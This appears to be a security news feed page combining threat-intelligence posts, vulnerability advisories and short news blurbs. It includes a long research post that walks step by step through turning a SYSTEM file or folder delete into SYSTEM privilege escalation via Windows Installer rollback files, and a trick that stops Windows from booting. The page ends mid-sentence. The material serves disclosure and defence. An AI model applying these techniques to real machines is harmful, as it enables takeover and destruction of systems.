Key Takeaways  A North Korean threat actor, Citrine Sleet, has been observed exploiting a zero-day vulnerability in Chromium, designated as CVE-2024-7971, to achieve Remote Code Execution (RCE).  Citrine Sleet, also tracked by other security firms under the names AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, is attributed to Bureau 121 of North Korea''s Reconnaissance General Bureau. The group primarily focuses on financial institutions, especially those involved with cryptocurrency, aiming for financial gain.  The group''s tactics, techniques, and procedures (TTPs) have now been linked to the FudModule rootkit, which has also been associated with Diamond Sleet, another North Korean threat actor.  Citrine Sleet creates fraudulent websites that mimic legitimate cryptocurrency trading platforms to distribute fake job applications or entice targets into downloading a compromised cryptocurrency wallet or trading application.  The TA typically infects targets with its custom trojan malware, AppleJeus, designed to gather information necessary to take control of victims'' cryptocurrency assets.  Overview   The Citrine Sleet threat actor group was observed by Microsoft researchers exploiting the CVE-2024-7971 zero-day vulnerability in the V8 JavaScript and WebAssembly engine, which affects versions of Chromium prior to 128.0.6613.84. By exploiting this vulnerability, the attackers achieved remote code execution (RCE) within the sandboxed Chromium renderer process. Google has since released a patch for the vulnerability, on August 21, 2024, and users are advised to update to the latest version of Chromium to mitigate the risk.   Technical Analysis  The observed attack chain involved a typical browser exploit sequence, starting with targets being directed to a Citrine Sleet-controlled exploit domain, voyagorclub[.]space, through common social engineering tactics.  Once the users were connected, the zero-day RCE exploit for CVE-2024-7971 was deployed, allowing the attackers to download and load shellcode containing a Windows sandbox escape exploit and the FudModule rootkit into memory.  FudModule is an advanced rootkit malware designed to target kernel access while avoiding detection. Threat actors have been seen using the FudModule data-only rootkit to gain admin-to-kernel access on Windows-based systems, enabling read/write primitive operations and conducting Direct Kernel Object Manipulation (DKOM).  The attack chain seen in Citrine Sleet''s zero-day exploit of CVE-2024-7971 closely mirrors the chain observed by Avast, which involves a variant of FudModule known as ""FudModule 2.0."" This variant includes malicious loaders and a late-stage remote access trojan (RAT). The research identified the previously unknown Kaolin RAT as the malware responsible for deploying the FudModule rootkit on targeted devices.  Conclusion and Recommendations  CVE-2024-7971 is the third vulnerability this year that North Korean threat actors have exploited to deploy the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193. To address zero-day exploits effectively, it is crucial not only to keep systems updated but also to use security solutions that offer comprehensive visibility across the cyberattack chain to detect and block attacker tools and malicious activities after exploitation.  To mitigate the risks posed by Citrine Sleet and similar threats, the following best practices are recommended:  Activate the automatic software update function on your computer, mobile device, and any other linked devices when feasible and practical.  Employ a trusted antivirus solution and internet security software suite on all connected devices, such as your PC, laptop, and mobile phone.  Conduct consistent vulnerability assessments to maintain proactive security.  Always use multi-factor authentication on accounts to lessen the risk of takeover.  The post FudModule Rootkit Targets Crypto, Linked to North Korean Citrine Sleet Group appeared first on Cyble.

by CYBLE

A recent report from the World Economic Forum explored how small and medium-sized enterprises (SMEs) can turn cybersecurity risk into an opportunity. We recently wrote about why securing small businesses is good for everyone – protecting third party providers at every level of a supply chain in order to enable a better overall security posture for every organisation in that chain. And we’re not alone in renewing our focus on the importance of security for SMEs; because as Akhilesh Tuteja (Global Cyber Security Leader at KPMG) noted in that World Economic Forum report, “the size of an enterprise no longer dictates its vulnerability to cyber threats.” Threat actors are targeting smaller businesses, identifying them as weak links that offer easy entry points into a network. What can SMEs do to improve their security and become small but strong links in global supply chains? SMEs must see cybersecurity as a business problem – not just a tech problem Small enterprises don’t have the same access to resources that larger organisations have. And because of this, they tend to focus on what’s immediately, obviously important (namely, sales and profit margins), and silo other aspects of business operations into small pots that sit much lower on their list of priorities. Cybersecurity is one of those aspects that gets compartmentalised and often neglected. Technical security systems are set up, and then forgotten about – with SMEs less likely to integrate security practices across their operations in an ongoing, dynamic way. This is a mistake. SMEs must change their perspective and start thinking about cybersecurity not as a technology problem, but as a business problem. “While understanding the technology that powers business is very important, understanding the risks it brings to business is far more important,” wrote Tuteja. “Unlike larger enterprises that can apply a higher degree of control across the enterprise, SMEs must identify areas of relevance and create a cyber strategy for different units, data types and systems. They should also explore more mature technologies, such as cloud computing, instead of spending time trying to build, manage and maintain their own systems.” When you integrate cybersecurity into your business strategy it creates opportunities for growth Instead of seeing cybersecurity as a risk alone, Tuteja urged small and medium enterprises to see it as an opportunity – with a good security strategy at the heart of an overall growth strategy. Why? Because customers, both in B2C and B2B markets, value trust. And they’re more likely to trust a small business if it can clearly demonstrate and explain the security protocols and practices it uses to keep customer information safe. When we interviewed Abeer Khedr (CISO at National Bank of Egypt) for the BHMEA blog, she said that the inequity between larger cyber resilient organisations, and smaller less resilient ones, will continue to increase. “This is a cause of concern because the less resilient companies could be our suppliers, our customers; it’s one ecosystem. This should drive our efforts in 2024 to increase awareness and support these companies on how to apply security measures and develop incident response capabilities to increase their cyber resilience.” Cybersecurity can’t be an afterthought for SMEs – and the cybersecurity sector needs to offer opportunities for small business leaders to understand the inextricable nature of business strategy and security, and develop security practices that facilitate high growth with low risk. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

Key Takeaways  CISA Alert: CISA warns of critical ICS vulnerabilities in Rockwell Automation and Delta Electronics products.  ThinManager ThinServer: Flaws in Rockwell Automation’s ThinManager ThinServer (versions 11.1.0 to 13.2.1) could allow system-level code execution. Affected sector: Manufacturing.  Delta DTN Soft: Vulnerability in Delta’s DTN Soft (version 2.0.1 and prior) enables remote code execution. Update to version 2.1. Affected sector: Energy.  FactoryTalk View SE: A flaw in Rockwell Automation’s FactoryTalk View SE 13.0 allows unauthorized file modifications. Affected sectors: Chemical, Energy, and others.  Mitigation: CISA advises minimizing ICS exposure, securing remote access, updating software, and implementing layered security measures.  Overview  On August 29, the Cybersecurity and Infrastructure Security Agency (CISA) released three advisories to warn users and administrators of several critical vulnerabilities affecting industrial control systems (ICS) from prominent vendors.  Advisory ICSA-24-242-01 address vulnerabilities in Rockwell Automation ThinManager ThinServer.  ICSA-24-242-02 covers a vulnerability in Delta Electronics DTN Soft.  ICSA-24-226-06 advises users about a vulnerability in Rockwell Automation FactoryTalk View Site Edition (Update A).  Cyble’s ICS vulnerabilities report last week looked at additional vulnerabilities in Rockwell and other ICS products, plus general recommendations for controlling risk in ICS networks.  Rockwell Automation ThinManager ThinServer Vulnerabilities  The first set of vulnerabilities, disclosed in ICSA-24-242-01, affects multiple versions of Rockwell Automation''s ThinManager ThinServer software, a client management tool. The flaws, which include improper privilege management, incorrect permission assignment, and improper input validation, could allow attackers to read arbitrary files and execute code with system-level privileges.  The affected versions of ThinManager ThinServer range from 11.1.0 to 13.2.1. CISA has assigned three CVE identifiers to these flaws: CVE-2024-7986, CVE-2024-7987, and CVE-2024-7988. The CVSS v4 scores for these vulnerabilities range from 6.8 to 9.3, indicating a high-to-critical level of risk.  Critical Infrastructure Sector Impacted: Manufacturing.  Delta Electronics DTN Soft Vulnerability  The second advisory, ICSA-24-242-02, focuses on a vulnerability in Delta Electronics'' DTN Soft temperature control software. The flaw, a deserialization of untrusted data issue (CWE-502), could allow an attacker to achieve remote code execution.  The vulnerability affects DTN Soft version 2.0.1 and prior. CISA has assigned CVE-2024-8255 to this flaw, with a CVSS v4 score of 8.4.  Delta Electronics recommends updating to the latest version, 2.1, to mitigate this vulnerability.  Critical Infrastructure Sector Impacted: Energy.  Rockwell Automation FactoryTalk View Site Edition Vulnerability  The third advisory, ICSA-24-226-06, covers a vulnerability in Rockwell Automation''s FactoryTalk View Site Edition, an HMI application. The flaw, an incorrect permission assignment for a critical resource (CWE-732), could allow any user to edit or replace files executed with elevated permissions.  The affected version is FactoryTalk View SE 13.0. CISA has assigned CVE-2024-7513 to this vulnerability, with a CVSS v4 score of 8.5.  Rockwell Automation recommends updating to a newer version of FactoryTalk to mitigate this vulnerability.  Critical Infrastructure Sector Impacted: Chemical; Commercial Facilities; Energy; Government Facilities; Manufacturing; Water and Wastewater Systems.  CISA Mitigation Advice  Based on the CISA advisories for the three industrial control system (ICS) vulnerabilities, the following general recommendations and mitigations are provided:  1. Minimize Network Exposure:  * Ensure that ICS devices and systems are not accessible from the internet. * Limit access to ICS devices and systems to only those who need it. * Use firewalls and other network segmentation techniques to isolate ICS networks from business networks.  2. Implement Secure Remote Access Methods:  * Use Virtual Private Networks (VPNs) to establish secure remote connections. * Regularly update VPN software and configurations to ensure they are secure. * Consider using other secure remote access methods, such as SSH or HTTPS.  3. Perform Regular Software Updates:  * Regularly update ICS software to the latest versions to ensure you have the latest security patches and fixes. * Use automated update mechanisms and monitoring to stay up-to-date.  4. Implement Security Best Practices:  * Use strong passwords and password policies to prevent unauthorized access. * Implement access controls, such as role-based access control (RBAC) and least privilege access. * Regularly audit and monitor ICS systems for suspicious activity.  5. Perform Impact Analysis and Risk Assessment:  * Regularly assess the potential impact of potential security incidents on your ICS systems. * Develop and implement incident response plans to mitigate the effects of a security incident.  6. Use Secure Protocols and Communications:  * Use secure communication protocols, such as HTTPS and SSH, to protect data in transit. * Regularly update and patch communication protocols to ensure they are secure.  7. Implement Defense-in-Depth Strategies:  * Implement multiple layers of security controls to prevent and detect security incidents. * Use a combination of technical and procedural controls to protect ICS systems.  8. Monitor for Suspicious Activity:  * Regularly monitor ICS systems and networks for suspicious activity. * Implement intrusion detection and prevention systems to detect and prevent security incidents.  The post CISA Warns of Critical ICS Vulnerabilities in Rockwell and Delta Electronics appeared first on Cyble.

by CYBLE

by ComputerWeekly

Activists claim Japanese industrial robots are being used to build military equipment for Israel. The robot maker denies the claims, but the episode reveals the complex ethics of global manufacturing.

by WIRED Security News

argv[0] tampering (@Wietze), Moodle eval() misuse (@RedTeamPT), ntoskrnl.exe PoC (@b1thvn_), 4x wappd exploits (@hyprdude), and more!

by Bad Sector Labs

This bill requires Web browsers to have an easy-to-find (and use) setting for consumers to send an opt-out preference signal by default to every site and app they interact with.

by Dark Reading

Microsoft warned that the DPRK''s latest innovative tack chains together previously unknown browser issues, then adds a rootkit to the mix to gain deep system access and steal crypto.

by Dark Reading

The Ohio city filed for a restraining order, claiming the researcher was working in tandem with the ransomware attackers.

by Dark Reading

The energy kahuna said that operations were disrupted after an attack on its supporting business applications.

by ITPro Today

One sign of the increasing maturity of the cybercriminal economy is the fast-growing use of infostealers, a category of malware that, as its name suggests, is designed to gather and exfiltrate information from your system.

by Barracuda

Insider threats are among the most challenging issues any cybersecurity team is likely to encounter. The only way to prevent these types of attacks is to ensure that data access is continuously monitored.

by Barracuda

U.S. Cyber Command has concluded CYBER FLAG 24-2, marking a significant milestone as the first iteration of the exercise to incorporate Offensive Cyberspace Operations, August 30.

by U.S. Cyber Command News

by Douglas Berdeaux, Senior Security Consultant   As penetration testers, ensuring the security and integrity of our tools and data is paramount. One key aspect of this is creating a […]

by Red Siege Blog

A roundup of every Hacker Summer Camp AI Talk, Bypassing airport security via SQL injection, Misconception about the nature of work, and more...

by Hive Five

A hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus. ""Head Mare uses more up-to-date methods for obtaining initial access,"" Kaspersky said in a Monday analysis of the group''s tactics and tools. ""For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which

by The Hacker News

A social engineering campaign is targeting entities in the Middle East using malware that impersonates Palo Alto Networks’ GlobalProtect VPN, according to researchers at Trend Micro.

by KnowBe4

Researchers at Palo Alto Networks’ Unit 42 are tracking dozens of scam campaigns that are using deepfake videos to impersonate CEOs, news anchors, and high-profile government officials.

by KnowBe4

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation. ""It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector,"" cybersecurity

by The Hacker News

The malware, first discovered two years ago, has returned in campaigns using SEO poisoning.

by Dark Reading

Episode 361 looks at the right to disconnect, Black Myth: Wukong and much more!

by Kaspersky

This blog post will guide you through the essential best practices for integrating DAST into your mobile development process. The post DAST Best Practices for Mobile Developers appeared first on Zimperium.

by Zimperium

Transport for London (TfL) is apparently fighting a cybersecurity incident but is rather sparing in providing details

by Malwarebytes Labs

The energy kahuna said that operations were disrupted after an attack on its supporting business applications.

by Dark Reading

Attackers have added aggressive social engineering to their arsenal, along with a novel Windows-manipulating persistence mechanism that demands developer vigilance.

by Dark Reading

This version of the blog is preserved for archival purposes only. An updated version of this blog, including links to new PoC code, can be found here. What do you do when you’ve found an arbitrary file delete as NT AUTHORITY\SYSTEM? Probably just sigh and call it a DoS. Well, no more. In this article, we’ll show you some great techniques for getting much more out of your arbitrary file deletes, arbitrary folder deletes, and other seemingly low-impact filesystem-based exploit primitives. The Trouble with Arbitrary File Deletes When you consider how to leverage an arbitrary file delete on Windows, two great obstacles present themselves: Most critical Windows OS files are locked down with DACLs that prevent modification even by SYSTEM. Instead, most OS files are owned by TrustedInstaller, and only that account has permission to modify them. (Exercise for the reader: Find the critical Windows OS files that can still be deleted or overwritten by SYSTEM!) Even if you find a file that you can delete as SYSTEM, it needs to be something that causes a “fail-open” (degradation of security) if deleted. A third problem that can arise is that some critical system files are inaccessible at all times due to sharing violations. Experience shows that finding a file to delete that meets all the above criteria is very hard. When looking in the usual places, which would be within C:\Windows, C:\Program Files or C:\Program Data, we’re not aware of anything that fits the bill. There is some prior work that involves exploiting antivirus and other products, but this is dependent on vulnerable behavior in those products. The Solution is Found Elsewhere: Windows Installer In March of 2021, we received a vulnerability report from researcher Abdelhamid Naceri (halov). The vulnerability he reported was an arbitrary file delete in the User Profile service, running as SYSTEM. Remarkably, his submission also included a technique to parlay this file delete into an escalation of privilege (EoP), resulting in a command prompt running as SYSTEM. The EoP works by deleting a file, but not in any of the locations you would usually think of. To understand the route to privilege escalation, we need to explain a bit about the operation of the Windows Installer service. The following explanation is simplified somewhat. The Windows Installer service is responsible for performing installations of applications. An application author supplies an .msi file, which is a database defining the changes that must be made to install the application: folders to be created, files to be copied, registry keys to be modified, custom actions to be executed, and so forth. To ensure that system integrity is maintained when an installation cannot be completed, and to make it possible to revert an installation cleanly, the Windows Installer service enforces transactionality. Each time it makes a change to the system, Windows Installer makes a record of the change, and each time it overwrites an existing file on the system with a newer version from the package being installed, it retains a copy of the older version. In case the install needs to be rolled back, these records allow the Windows Installer service to restore the system to its original state. In the simplest scenario, the location for these records is a folder named C:\Config.Msi. During an installation, the Windows Installer service creates a folder named C:\Config.Msi and populates it with rollback information. Whenever the install process makes a change to the system, Windows Installer records the change in a file of type .rbs (rollback script) within C:\Config.Msi. Additionally, whenever the install overwrites an older version of some file with a newer version, Windows Installer will place a copy of the original file within C:\Config.Msi. This type of a file will be given the .rbf (rollback file) extension. In case an incomplete install needs to be rolled back, the service will read the .rbs and .rbf files and use them to revert the system to the state that existed before the install. This mechanism must be protected against tampering. If a malicious user were able to alter the .rbs and/or .rbf files before they are read, arbitrary changes to the state of the system could occur during rollback. Therefore, Windows Installer sets a strong DACL on C:\Config.Msi and the enclosed files. Here is where an opening arises, though: What if an attacker has an arbitrary folder delete vulnerability? They can use it to completely remove C:\Config.Msi immediately after Windows Installer creates it. The attacker can then recreate C:\Config.Msi with a weak DACL (note that ordinary users are allowed to create folders at the root of C:\). Once Windows Installer creates its rollback files within C:\Config.Msi, the attacker will be able to replace C:\Config.Msi with a fraudulent version that contains attacker-specified .rbs and .rbf files. Then, upon rollback, Windows Installer will make arbitrary changes to the system, as specified in the malicious rollback scripts. Note that the only required exploit primitive here is the ability to delete an empty folder. Moving or renaming the folder works equally well. From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP In conjunction with this article, we are releasing source code for Abdelhamid Naceri’s privilege escalation technique. This exploit has wide applicability in cases where you have a primitive for deleting, moving, or renaming an arbitrary empty folder in the context of SYSTEM or an administrator. The exploit should be built in the Release configuration for either x64 or x86 to match the architecture of the target system. Upon running the exploit, it will prompt you to initiate a delete of C:\Config.Msi. You can do this by triggering an arbitrary folder delete vulnerability, or, for testing purposes, you can simply run rmdir C:\Config.Msi from an elevated command prompt. Upon a successful run, the exploit will drop a file to C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. You can then get a SYSTEM command prompt by starting the On-Screen Keyboard osk.exe and then switching to the Secure Desktop, for example by pressing Ctrl-Alt-Delete. The exploit contains an .msi file. The main thing that’s special about this .msi is that it contains two custom actions: one that produces a short delay, and a second that throws an error. When the Windows Installer service tries to install this .msi, the installation will halt midway and rollback. By the time the rollback begins, the exploit will have replaced the contents of C:\Config.Msi with a malicious .rbs and .rbf. The .rbf contains the bits of the malicious HID.DLL, and the .rbs instructs Windows Installer to “restore” it to our desired location (C:\Program Files\Common Files\microsoft shared\ink\). The full mechanism of the EoP exploit is as follows: The EoP creates a dummy C:\Config.Msi and sets an oplock. The attacker triggers the folder delete vulnerability to delete C:\Config.Msi (or move C:\Config.Msi elsewhere) in the context of SYSTEM (or admin). Due to the oplock, the SYSTEM process is forced to wait. Within the EoP, the oplock callback is invoked. The following several steps take place within the callback. The EoP moves the dummy C:\Config.Msi elsewhere. This is done so that the oplock remains in place and the vulnerable process is forced to continue waiting, while the filesystem location C:\Config.Msi becomes available for other purposes (see further). The EoP spawns a new thread that invokes the Windows Installer service to install the .msi, with UI disabled. The callback thread of the EoP continues and begins polling for the existence of C:\Config.Msi. For reasons that are not clear to me, Windows Installer will create C:\Config.Msi, use it briefly for a temp file, delete it, and then create it a second time to use for rollback scripts. The callback thread polls C:\Config.Msi to wait for each of these actions to take place. As soon as the EoP detects that Windows Installer has created C:\Config.Msi for the second time, the callback thread exits, releasing the oplock. This allows the vulnerable process to proceed and delete (or move, or rename) the C:\Config.Msi created by Windows Installer. The EoP main thread resumes. It repeatedly attempts to create C:\Config.Msi with a weak DACL. As soon as the vulnerable process deletes (or moves, or renames) C:\Config.Msi, the EoP’s create operation succeeds. The EoP watches the contents of C:\Config.Msi and waits for Windows Installer to create an .rbs file there. The EoP repeatedly attempts to move C:\Config.Msi elsewhere. As soon as Windows Installer closes its handle to the .rbs, the move succeeds, and the EoP proceeds. The EoP creates C:\Config.Msi one final time. Within it, it places a malicious .rbs file having the same name as the original .rbs. Together with the .rbs, it writes a malicious .rbf. After the delay and the error action specified in the .msi, Windows Installer performs a rollback. It consumes the malicious .rbs and .rbf, dropping the DLL. Note that at step 7, there is a race condition that sometimes causes problems. If the vulnerable process does not immediately awaken and delete C:\Config.Msi, the window of opportunity may be lost because Windows Installer will soon open a handle to C:\Config.Msi and begin writing an .rbs there. At that point, deleting C:\Config.Msi will no longer work, because it is not an empty folder. To avoid this, it is recommended to run the EoP on a system with a minimum of 4 processor cores. A quiet system, where not much other activity is taking place, is probably ideal. If you do experience a failure, it will be necessary to retry the EoP and trigger the vulnerability a second time. From Arbitrary File Delete to SYSTEM EoP The technique described above assumes a primitive that deletes an arbitrary empty folder. Often, though, one has a file delete primitive as opposed to a folder delete primitive. That was the case with Abdelhamid Naceri’s User Profile bug. To achieve SYSTEM EoP in this case, his exploit used one additional trick, which we will now explain. In NTFS, the metadata (index data) associated with a folder is stored in an alternate data stream on that folder. If the folder is named C:\MyFolder, then the index data is found in a stream referred to as C:\MyFolder::$INDEX_ALLOCATION. Some implementation details can be found here. For our purposes, though, what we need to know is this: deleting the ::$INDEX_ALLOCATION stream of a folder effectively deletes the folder from the filesystem, and a stream name, such as C:\MyFolder::$INDEX_ALLOCATION, can be passed to APIs that expect the name of a file, including DeleteFileW. So, if you are able to get a process running as SYSTEM or admin to pass an arbitrary string to DeleteFileW, then you can use it not only as a file delete primitive but also as a folder delete primitive. From there, you can get a SYSTEM EoP using the exploit technique discussed above. In our case, the string you want to pass is C:\Config.Msi::$INDEX_ALLOCATION. Be advised that success depends on the particular code present in the vulnerable process. If the vulnerable process simply calls DeleteFileA/DeleteFileW, you should be fine. In other cases, though, the privileged process performs other associated actions, such as checking the attributes of the specified file. This is why you cannot test this scenario from the command prompt by running del C:\Config.Msi::$INDEX_ALLOCATION. From Folder Contents Delete to SYSTEM EoP Leveling up once more, let us suppose that the vulnerable SYSTEM process does not allow us to specify an arbitrary folder or file to be deleted, but we can get it to delete the contents of an arbitrary folder, or alternatively, to recursively delete files from an attacker-writable folder. Can this also be used for EoP? Researcher Abdelhamid Naceri demonstrated this as well, in a subsequent submission in July 2021. In this submission he detailed a vulnerability in the SilentCleanup scheduled task, running as SYSTEM. This task iterates over the contents of a temp folder and deletes each file it finds there. His technique was as follows: Create a subfolder, temp\folder1. Create a file, temp\folder1\file1.txt. Set an oplock on temp\folder1\file1.txt. Wait for the vulnerable process to enumerate the contents of temp\folder1 and try to delete the file file1.txt it finds there. This will trigger the oplock. When the oplock triggers, perform the following in the callback:a. Move file1.txt elsewhere, so that temp\folder1 is empty and can be deleted. We move file1.txt as opposed to just deleting it because deleting it would require us to first release the oplock. This way, we maintain the oplock so that the vulnerable process continues to wait, while we perform the next step.b. Recreate temp\folder1 as a junction to the \RPC Control folder of the object namespace. c. Create a symlink at \RPC Control\file1.txt pointing to C:\Config.Msi::$INDEX_ALLOCATION. When the callback completes, the oplock is released and the vulnerable process continues execution. The delete of file1.txt becomes a delete of C:\Config.Msi. Readers may recognize the symlink technique involving \RPC Control from James Forshaw’s symboliclink-testing-tools. Note, though, that it’s not sufficient to set up the junction from temp\folder1 to \RPC Control and then let the arbitrary file delete vulnerability do its thing. That’s because \RPC Control is not an enumerable file system location, so the vulnerable process would not be able to find \RPC Control\file1.txt via enumeration. Instead, we must start off by creating temp\folder1\file1.txt as a bona fide file, allowing the vulnerable process to find it through enumeration. Only afterward, just as the vulnerable process attempts to open the file for deletion, we turn temp\folder1 into a junction pointing into the object namespace. For working exploit code, see project FolderContentsDeleteToFolderDelete. Note that the built-in malware detection in Windows will flag this process and shut it down. I recommend adding a “Process” exclusion for FolderContentsDeleteToFolderDelete.exe. You can chain these two exploits together. To begin, run FolderOrFileDeleteToSystem and wait for it to prompt you to trigger privileged deletion of Config.Msi. Then, run FolderContentsDeleteToFolderDelete /target C:\Config.Msi. It will prompt you to trigger privileged deletion of the contents of C:\test1. If necessary for your exploit primitive, you can customize this location using the /initial command-line switch. For testing purposes, you can simulate the privileged folder contents deletion primitive by running del /q C:\test1\* from an elevated command prompt. FolderContentsDeleteToFolderDelete will turn this into a delete of C:\Config.Msi, and this will enable FolderOrFileDeleteToSystem to drop the HID.DLL. Finally, open the On-Screen Keyboard and hit Ctrl-Alt-Delete for your SYSTEM shell. From Arbitrary Folder Create to Permanent DoS Before closing, we’d like to share one more technique we learned from this same researcher. Suppose you have an exploit primitive for creating an arbitrary folder as SYSTEM or admin. Unless the folder is created with a weak DACL, it doesn’t sound like this would be something that could have any security impact at all. Surprisingly, though, it does: it can be used for a powerful denial of service. The trick is to create a folder such as this one:       C:\Windows\System32\cng.sys Normally there is no file or folder by that name. If an attacker name squats on that filesystem location with an extraneous file or even an empty folder, the Windows boot process is disrupted. The exact mechanism is a bit of a mystery. It would appear that Windows attempts to load the cng.sys kernel module from the improper location and fails, and there is no retry logic that allows it to continue and locate the proper driver. The result is a complete inability to boot the system. Other drivers can be used as well for the same effect. Depending on the vulnerability at hand, this DoS exploit could even be a remote DoS, as nothing is required besides the ability to drop a single folder or file. Conclusion The techniques we’ve presented here show how some rather weak exploit primitives can be used for great effect. We have learned that: • An arbitrary folder delete/move/rename (even of an empty folder), as SYSTEM or admin, can be used to escalate to SYSTEM.• An arbitrary file delete, as SYSTEM or admin, can usually be used to escalate to SYSTEM.• A delete of contents of an arbitrary folder, as SYSTEM or admin, can be used to escalate to SYSTEM.• A recursive delete, as SYSTEM or admin, of contents of a fixed but attacker-writable folder (such as a temp folder), can be used to escalate to SYSTEM.• An arbitrary folder create, as SYSTEM or admin, can be used for a permanent system denial-of-service.• An arbitrary file delete or overwrite, as SYSTEM or admin, even if there is no control of contents, can be used for a permanent system denial-of-service. We would like to thank researcher Abdelhamid Naceri for his great work in developing these exploit techniques, as well as for the vulnerabilities he has been reporting to our program. We look forward to seeing more from him in the future. Until then, you can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

An old but persistent email scam known as ""sextortion"" has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target''s home in a bid to make threats about publishing the videos more frightening and convincing.

by Krebs on Security

CERT-In''s advisory on Palo Alto Networks vulnerabilities and WikiLoader’s fake GlobalProtect installers highlight major security risks. Key Takeaways CERT-In has issued a critical advisory highlighting vulnerabilities in multiple Palo Alto Networks applications, including GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR. Concurrently, new malware distribution methods involving WikiLoader have been detected, leveraging spoofed GlobalProtect installers. The vulnerabilities identified include privilege escalation (CVE-2024-5915), information disclosure (CVE-2024-5916), and command injection (CVE-2024-5914). WikiLoader, a sophisticated loader, uses advanced evasion techniques such as SEO poisoning to distribute its payload. Specific versions of affected software and newly observed malware tactics require immediate attention. Timely updates and robust defense mechanisms are critical for mitigating these risks. Recommended actions include upgrading affected software, restricting access, using threat detection tools, and staying vigilant against sophisticated malware campaigns like WikiLoader. Overview CERT-In''s recent advisory and the emergence of WikiLoader malware highlight pressing security concerns involving Palo Alto Networks applications and new malware distribution techniques. CERT-In has pinpointed critical vulnerabilities in GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR. These vulnerabilities range from privilege escalation and information disclosure to command injection. In parallel, the WikiLoader campaign, which uses fake GlobalProtect installers for malware distribution, illustrates the increasing sophistication of cyber threats. The vulnerabilities span multiple Palo Alto Networks applications, each with varying degrees of impact and risk. The GlobalProtect app for Windows, a widely used tool for secure remote access, is affected across several versions. Specifically, versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x are impacted. Detailed Description of Vulnerabilities and Malware Campaign 1. Privilege Escalation Vulnerability (CVE-2024-5915) CVE-2024-5915 is a local privilege escalation vulnerability found in the GlobalProtect app for Windows. This issue arises from an unspecified error that allows a local user to execute programs with elevated privileges, potentially compromising the entire system. The flaw can enable an attacker who already has local access to gain administrative control over the system, leading to a high risk of system-wide compromise. The vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 5.2. The attack vector is local, which means that the attacker needs physical or remote desktop access to exploit the flaw. The attack complexity is low, indicating that exploiting the vulnerability does not require sophisticated techniques. The impact can be significant, leading to potential breaches of confidentiality, integrity, and availability. The vulnerability impacts GlobalProtect App versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x. Patches and updates are planned, with updates expected by August 2024 for version 6.3.1, November 2024 for 6.0.x, and December 2024 for 5.1.x. Until updates are applied, restricting access to GlobalProtect installation directories and ensuring they are protected from non-administrative modifications is recommended. 2. Information Disclosure Vulnerability (CVE-2024-5916) CVE-2024-5916 is an information disclosure vulnerability affecting PAN-OS and Cloud NGFW. This flaw involves the exposure of sensitive information, such as secrets, passwords, and tokens of external systems, through configuration logs. A read-only administrator with access to these logs could view sensitive data, leading to potential unauthorized access to critical systems. This vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 6.0. The attack vector is network-based, meaning that an attacker can exploit the flaw remotely. The attack complexity is low, and no user interaction is required, making the vulnerability particularly concerning. The primary impact is on confidentiality, though integrity and availability are not directly affected. PAN-OS versions 11.0 < 11.0.4, 10.2 < 10.2.8, and Cloud NGFW versions prior to August 15 on Azure and August 23 on AWS are affected. Organizations should upgrade to PAN-OS 11.0.4, 10.2.8, or later versions and ensure Cloud NGFW is updated to versions released on or after the specified dates. It is also crucial to revoke any compromised credentials to prevent unauthorized access. 3. Command Injection Vulnerability (CVE-2024-5914) CVE-2024-5914 is a command injection vulnerability found in the Cortex XSOAR CommonScripts pack. This issue allows unauthenticated attackers to execute arbitrary commands within the context of an integration container. Command injection vulnerabilities are particularly dangerous as they can be exploited to execute arbitrary commands, potentially leading to severe security breaches. The vulnerability has a HIGH severity rating, with a CVSSv4.0 Base Score of 7.0. The attack vector is network-based, and while the attack complexity is high, the lack of required user interaction makes it a significant threat. The impact includes substantial risks to confidentiality and integrity, with a potential low impact on availability. The vulnerability affects versions of the Cortex XSOAR CommonScripts pack before 1.12.33. To address the issue, upgrade to version 1.12.33 or later. Additionally, removing any integration usage of the ScheduleGenericPolling or GenericPollingScheduledTask scripts can help prevent exploitation. The WikiLoader Malware Campaign WikiLoader is a sophisticated loader that has been observed using advanced evasion techniques to distribute malware. The loader leverages SEO poisoning and fake GlobalProtect installers to deliver its payload. This method involves spoofing legitimate software installers, which increases the likelihood of successful malware delivery. Attackers have utilized SEO poisoning techniques to direct users to spoofed sites, such as bitbucket[.]org, where fake GlobalProtect installers containing WikiLoader components are hosted. This technique capitalizes on the high trust placed in legitimate software sources to trick users into downloading malicious payloads. Upon infection, WikiLoader downloads and extracts additional components executes them and uses legitimate binaries for side-loading. The malware creates persistence on the system through randomized file names and employs various obfuscation methods to avoid detection. WikiLoader includes several anti-analysis measures, such as detecting virtual machine environments to evade sandbox analysis, displaying misleading error messages, and employing obfuscation through randomized folder names. These techniques are designed to hinder detection and analysis by security tools. Recommendations and Mitigations To effectively address the identified vulnerabilities and new malware threats, organizations should implement the following measures: To address the vulnerabilities, apply the latest patches and updates for GlobalProtect, PAN-OS, Cloud NGFW, and Cortex XSOAR. Check for updates regularly and apply them promptly. Limit access to GlobalProtect installation directories and ensure that sensitive credentials in PAN-OS are protected. Revoke any compromised credentials and review access controls to prevent unauthorized access. Implement and configure threat detection tools to monitor for unusual activity and signs of infection. Utilize XQL queries to identify indicators of WikiLoader and other malware behaviors. Provide staff with training and awareness programs on emerging threats and security best practices. Ensure that employees are informed about the risks of downloading software from untrusted sources and the importance of verifying software integrity. Conduct regular vulnerability assessments and scans 